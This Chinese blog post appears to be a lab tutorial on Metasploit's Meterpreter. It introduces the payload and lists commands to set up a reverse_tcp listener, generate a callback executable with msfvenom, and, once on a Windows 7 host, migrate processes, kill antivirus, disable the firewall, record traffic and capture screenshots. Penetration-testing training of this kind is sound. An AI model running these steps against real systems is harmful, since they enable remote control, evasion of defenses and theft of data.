Loading

Metasploit Meterpreter

一、什么是Meterpreter

  Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕捉按键信息、清楚应用程序、显示、远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS【基于追的入侵检测系统】很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也变得非常困难。

 

二、常用命令

2.1 进入meterpreter

(1)开启监听

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.244.128
lhost => 192.168.244.128
msf5 exploit(multi/handler) > set lport 1155
lport => 1155
msf5 exploit(multi/handler) > run

(2)生成payload

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.244.128 lport=1155 -f exe > 123.exe

(3)window 7运行 123.exe

  (4)查看建立的meterpreter链接

 

 

 

 

2.2 常用命令

(1)进程迁移

meterpreter > ps
meterpreter > migrate 1524

 

 

 (2)关闭杀软

meterpreter > kill 

 

(3)关闭防火墙

meterpreter > netsh adcfirewall set allprofiles state off

(4)查看目标主机所有流量

meterpreter >  run packetrecorder -i 1

(5) 提取系统信息

meterpreter >  run scraper

(6) 截屏

 screenshot

(7) 获取系统运行的平台

meterpreter > sysinfo

 

 

 

 

 

 

posted @ 2018-03-31 09:22  KubeSec  阅读(504)  评论(0)    收藏  举报